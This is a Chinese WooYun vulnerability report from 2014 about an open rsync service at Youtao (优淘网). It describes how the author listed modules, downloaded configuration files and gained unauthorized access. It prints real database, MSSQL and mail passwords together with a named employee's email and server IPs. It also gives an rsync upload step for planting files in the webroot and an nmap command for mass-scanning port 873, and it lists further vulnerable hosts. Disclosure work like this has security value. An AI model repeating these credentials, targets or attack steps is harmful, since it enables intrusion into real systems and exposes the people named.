当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047689

漏洞标题:优淘网某服务器rsync配置错误泄漏信息

相关厂商:优淘网

漏洞作者: l137

提交时间:2014-01-02 16:53

修复时间:2014-02-16 16:53

公开时间:2014-02-16 16:53

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

优淘某站点rsync配置未设置访问权限,造成rsync任意下载,任意上传...
重要的数据库,邮箱,ssh帐号(貌似是技术部门负责人)的配置信息被硬编码在代码中造成泄漏

详细说明:

同问题描述

liet@kali:~$ rsync 210.14.138.23::
tspweb tspweb file
newtspweb newtspweb file
system tspweb file


找一下配置文件,mssql是可以外网登入的,mysql试了下不行,用邮箱的帐号也可以登入ssh

liet@kali:~/code/python/study/sec/rsync_hack/210.14.138.23/tspweb/config/tspweb$ ls
database.config.php mail.config.php page.config.php router.config.php smarty.config.php sync.config.php


数据库配置文件

<?php
/**
* db.config.php
*
* 数据库配置文件
*
* youtao for framework
*
* @package youtaosystem
* @author hirry(lijinhou@youtao.com)
* @since version 1.0
* @time 2012-6-29
*/
return array(
'mySqlMaster' => array(
'driver' => 'mysql',
'dbhost' => 'localhost',
'dbname' => 'youtao',
'dbuser' => 'tspyoutaoadmin',
'dbpass' => 'tspyoutaoadmin@WSX',
'dbport' => '3306'
),
'mySqlRead' => array(
'driver' => 'mysql',
'dbhost' => 'localhost',
'dbname' => 'youtao',
'dbuser' => 'tspyoutaoadmin',
'dbpass' => 'tspyoutaoadmin@WSX',
'dbport' => '3306'
),

'sqlServerMaster' => array(
'driver' => 'mssql',
'dbhost' => '192.168.1.3',
'dbname' => 'youtao',
'dbuser' => 'youtaoasp',
'dbpass' => 'youtaooldwebadmin',
'dbport' => '1433'
),
'sqlServerRead' => array(
'driver' => 'mssql',
'dbhost' => '192.168.1.3',
'dbname' => 'youtao',
'dbuser' => 'youtaoasp',
'dbpass' => 'youtaooldwebadmin',
'dbport' => '1433'
)

);
/*
return array(
'mySqlMaster' => array(
'driver' => 'mysql',
'dbhost' => 'localhost',
'dbname' => 'youtao',
'dbuser' => 'root',
'dbpass' => 'houhou123',
'dbport' => '3306'
),
'mySqlRead' => array(
'driver' => 'mysql',
'dbhost' => 'localhost',
'dbname' => 'youtao',
'dbuser' => 'root',
'dbpass' => 'houhou123',
'dbport' => '3306'
)
);
*/


cat mail.config.php 
<?php
/**
* mail.config.php
*
* mail配置文件
*
* youtao for framework
*
* @package youtaosystem
* @author hirry(lijinhou@youtao.com)
* @since version 1.0
* @time 2012-6-29
*/
return array(
'mail_charset' => 'utf-8',
'mail_host' => 'smtp.youtao.com',
'mail_username' => 'lijinhou@youtao.com',
'mail_password' => 'houhou123',
'mail_fromname' => '优淘官网-第三方销售渠道整合平台 ', //邮箱显示名称
'mail_from' => 'lijinhou@youtao.com',
'mail_ishtml' => 'true' //是否支持html邮件,true 或false
);
?>


rsync 经常用来同步web部分的代码,rsync控制不好,相当于直接给其他人留了一个任意的上传下载的漏洞,直接rsync -R ./xxx remote:/webroot/ 这个比费劲挖shell简单多了,结合nmap
sudo nmap -sS -Pn -T4 -p873 xxx.xxx.0.0/16 -oX out.xml
跟一点自己写的小脚本可以对全网段的rsync弱配置进行检测,已大面积拟补精度上的不足..
比如对210.14..0.0/16批量检测下,就得到两个弱配置

210.14.138.23
210.14.152.120

漏洞证明:

Screenshot from 2014-01-02 16:31:55.png


邮箱

Screenshot from 2014-01-02 15:27:19.png


内网登入

210.14.138.23.png


210.14.138.23_ifconfig.png


msf 测试 mssql可登入

210.14.138.3_mssql.png


修复方案:

几条配置,你们可以的

版权声明:转载请注明来源 l137@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论